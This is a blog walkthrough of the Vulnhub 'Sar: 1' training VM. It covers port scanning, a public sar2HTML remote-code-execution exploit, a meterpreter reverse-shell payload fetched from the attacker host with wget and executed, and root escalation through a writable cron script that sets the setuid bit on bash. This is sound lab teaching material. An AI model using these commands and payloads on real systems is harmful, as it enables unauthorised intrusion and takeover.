Home Vulnhub - Sar: 1
Post
Cancel

Vulnhub - Sar: 1

By h3xit
Posted Jan 12 Updated Jan 17 3 min read

Challenge description

https://www.vulnhub.com/entry/sar-1,425/

Sar is an OSCP-Like VM with the intent of gaining experience in the world of penetration testing.

Reconnaissance / Enumeration

Port scanning and service identification

We start by scanning the ports on this machine. We have only one open port

1
2
3
4
5
6
7
8

$ rustscan -a x.x.x.x -r 1-65535 -- -A -sC

PORT   STATE SERVICE REASON  VERSION
80/tcp open  http    syn-ack Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-methods:
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-title: Apache2 Ubuntu Default Page: It works

Web Enumeration

The web service show the default apache page at the root. Let’s do some enumeration to try and find more.

We start with /robots.txt :

1

sar2HTML

Which leads us to a page which seem to be a web application named sar2html v3.2.1

sar2html

Let’s find out if it’s vulnerable :

1
2
3
4
5
6
7

$ searchsploit sar2html
---------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                              |  Path
---------------------------------------------------------------------------- ---------------------------------
sar2html 3.2.1 - 'plot' Remote Code Execution                               | php/webapps/49344.py
Sar2HTML 3.2.1 - Remote Command Execution                                   | php/webapps/47204.txt
---------------------------------------------------------------------------- ---------------------------------

It looks like we can get RCE through this web application

Exploitation

exploitdb points us to an exploit so let’s try it out :

1
2
3
4
5
6
7

$ cp /usr/share/exploitdb/exploits/php/webapps/49344.py .
$ python3 49344.py
Enter The url => http://1.1.1.1/sar2HTML
Command => id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Command =>

Having an RCE exploit in hands, the next step is to establish a foothold on the target

Foothold

  • First we create a meterpreter payload which we serve with python’s http.server

    1
2

    $ msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=1.1.1.1 LPORT=4444 -f elf -o mp
$ python3 -m http.server

  • Then we start our metasploit listener

    1
2
3
4
5
6
7
8
9
10
11
12

    $ msfconsole
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST eth0
LHOST => eth0
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 1.1.1.1:4444

  • Now we can download and execute the payload on the target through RCE exploit command line

    1

    Command => wget 1.1.1.1:8000/mp -O /tmp/mp && chmod 777 /tmp/mp && /tmp/mp &&

  • Stabilize our new shell :

    1
2
3
4
5
6
7
8
9
10
11

    [*] Sending stage (3012548 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:41106 ) at 2022-01-13 05:20:53 +0000
meterpreter > shell
python3 -c "import pty;pty.spawn('/bin/bash')"
export TERM=xterm
export SHELL=bash
export TERM=xterm-256color
stty rows 91 columns 190
www-data@sar:~/html/sar2HTML$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data

We have foothold on the target as www-data

Privilege Escalation

Now it’s time to escalate our privileges

There is a crontab that runs as root every 5 minutes :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

$ cat /etc/crontab
*/5  *    * * *   root    cd /var/www/html/ && sudo ./finally.sh

$ ls -l /var/www/html
total 32
-rwxr-xr-x 1 root     root        22 Oct 20  2019 finally.sh
-rw-r--r-- 1 www-data www-data 10918 Oct 20  2019 index.html
-rw-r--r-- 1 www-data www-data    21 Oct 20  2019 phpinfo.php
-rw-r--r-- 1 root     root         9 Oct 21  2019 robots.txt
drwxr-xr-x 4 www-data www-data  4096 Jan 13 10:49 sar2HTML
-rwxrwxrwx 1 www-data www-data    30 Oct 21  2019 write.sh

$ cat /var/www/html/finally.sh
#!/bin/sh

./write.sh

$ cat /var/www/html/write.sh
#!/bin/sh

touch /tmp/gateway

We dont have write permission on the job’s script but we do on the second script, write.sh. Let’s exploit this misconfiguration :

1
2
3
4
5
6

$ echo 'chmod +s /bin/bash' >> /var/www/html/write.sh
$ cat write.sh
#!/bin/sh

touch /tmp/gateway
chmod +s /bin/bash

Wait for it …

1
2

$ ls -l /bin/bash
-rwsr-sr-x 1 root root 1113504 Jun  7  2019 /bin/bash

/bin/bash now has the setuid bit so we can use it to escalate to root :

1
2
3
4

$ /bin/bash -p
bash-4.4# id && hostname
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
sar

Thanks for reading <3

h3x

vulnhub
linux cve cron
This post is licensed under CC BY 4.0 by the author.
Recent Update
Contents